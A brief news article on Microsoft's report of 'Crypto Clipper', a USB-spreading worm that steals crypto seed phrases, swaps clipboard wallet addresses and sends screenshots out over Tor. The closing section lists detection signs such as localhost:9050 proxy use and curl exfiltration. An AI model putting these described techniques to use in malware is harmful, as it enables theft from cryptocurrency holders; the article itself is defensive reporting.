Microsoft warns of self-spreading malware that steals cryptocurrency
What's the story
Microsoft has discovered a new strain of self-propagating malware, dubbed "Crypto Clipper." The worm spreads through USB drives and targets cryptocurrency credentials. Once it gets hold of the information, Crypto Clipper sends it to servers controlled by attackers. The software also takes five screenshots over a 10-second period and sends both the credentials and images via Tor, an anonymous routing network protocol.
Malware mechanics
Crypto clipper gets its name from how it monitors clipboard
Crypto Clipper gets its name from the way it monitors clipboard contents for wallet addresses or seed phrases. When it finds such patterns, the malware downloads itself through a SOCKS5 proxy, a network protocol that sends traffic through a proxy server to its final destination. The Tor connection is established by Crypto Clipper using this same method, making detection and removal even more difficult.
Infection strategy
Crypto Clipper spreading via .lnk files on USB drives
Microsoft observed Crypto Clipper spreading via .lnk files on USB drives. These files store executable code, which checks if the malware is already installed on a device when an infected USB drive is plugged in. If not, it downloads itself through the Tor proxy. To hide traces of the worm, it scans the infected USB drive and renames .lnk files.
Information theft
Malware replaces found addresses with attacker-controlled wallets
Crypto Clipper not only monitors clipboard contents for standardized 12- or 24-word seed phrases but also uploads them along with screenshots to the attacker's server. It even replaces found addresses with those belonging to attacker-controlled wallets, diverting payments into their pockets. Microsoft believes the purpose of these screenshots is to provide context that may be useful.
Security measures
How to detect crypto clipper on your device?
Microsoft Defender for Endpoint detects Crypto Clipper components as Suspicious JavaScript processes and Possible data exfiltrations using Curl. Meanwhile, Microsoft Defender Antivirus flags it as Trojan: Win32/CryptoBandits.A. More generally, the strongest signs of infection are script interpreters spawning suspicious child processes, proxy usage on localhost:9050, screen-capture commands in PowerShell, and signs of clipboard inspection or crypto-address replacement.